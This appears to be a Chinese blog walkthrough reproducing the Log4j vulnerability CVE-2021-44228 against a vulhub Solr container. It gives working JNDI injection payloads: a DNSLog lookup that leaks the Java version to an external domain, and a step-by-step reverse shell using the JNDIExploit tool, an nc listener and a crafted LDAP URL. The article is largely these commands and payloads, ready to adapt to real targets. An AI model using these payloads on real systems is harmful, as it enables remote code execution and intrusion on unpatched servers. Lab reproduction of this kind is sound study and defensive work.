码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • log4j漏洞CVE-2021-44228复现-排雷篇


    一、环境搭建(用相同的环境才能保证一定成功)

    下载vulhub,其他环境可能存在GET请求无效问题:

    git clone https://github.com/vulhub/vulhub.git

    切换到指定漏洞环境目录:

    vulhub/log4j/CVE-2021-44228

    开启docker:
    docker compose up -d

    复制代码
    ➜  vulhub git:(master) cd vulhub/log4j/CVE-2021-44228 
    ➜ CVE
    -2021-44228 git:(master) docker compose up -d [+] Running 9/9
    ⠿ solr Pulled
    107.8s
    ⠿ 43c265008fae Pull complete
    25.3s
    ⠿ af36d2c7a148 Pull complete
    26.0s
    ⠿ 2b7b4d10e1c1 Pull complete
    26.1s
    ⠿ f264389d8f2f Pull complete
    26.2s
    ⠿ 1a2c46e93f4a Pull complete
    26.3s
    ⠿ f9506bb322c0 Pull complete
    48.9s
    ⠿ 96f5dad14c2c Pull complete
    49.0s
    ⠿ c387eff49cc3 Pull complete
    90.9s [+] Running 2/2
    ⠿ Network cve
    -2021-44228_default Created 0.1s
    ⠿ Container cve
    -2021-44228-solr-1 Started
    复制代码

    访问地址显示如下界面表示搭建成功: http://127.0.0.1:8983

     

    二、漏洞验证

    1. 登陆http://dnslog.cn/获取随机域名,下图中的第一步;
    2. 漏洞页面修改url为:http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xdeuza.dnslog.cn};
    3. 查看dnslog显示请求记录表示漏洞存在,上图中的第三步,未显示则点击上图中的第二步“Refresh Record”;

     

     

    三、反弹shell

    下载JNDI注入工具,https://github.com/WhiteHSBG/JNDIExploit,MD5 (JNDIExploit.v1.4.zip) = bafe42623aae09d18bafa610844d57c7 ,之前一直用1.0总是无法成功反弹shell

    解压后启动:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i  172.16.242.3

    同时开启nc监听:nc -lvnp 6666

    nc监听和JNDIExploit在同一台机器上,IP:172.16.242.3

    构造payload请求并访问:http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://172.16.242.3:1389/Basic/ReverseShell/172.16.242.3/6666}

     

    后台显示JNDI注入成功: 

     nc反弹shell成功上线 :

     

  • 相关阅读:
    《Unix 网络编程》08:基本UDP套接字编程
    使用 🧨 Diffusers 实现 ControlNet 高速推理
    1699. 两人之间的通话次数
    吴恩达2022机器学习专项课程(一) 6.3 决策边界&第三周课后实验:Lab3决策边界
    JAVA毕业设计二手车商城计算机源码+lw文档+系统+调试部署+数据库
    101个CV模型集体开源,魔搭社区视觉AI深度解析
    软件调试技术概览
    Modern C++
    redis中永久设置密码与设置密码后使用密码登录
    Linux命令之find
  • 原文地址:https://www.cnblogs.com/MalwareA/p/17785204.html
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号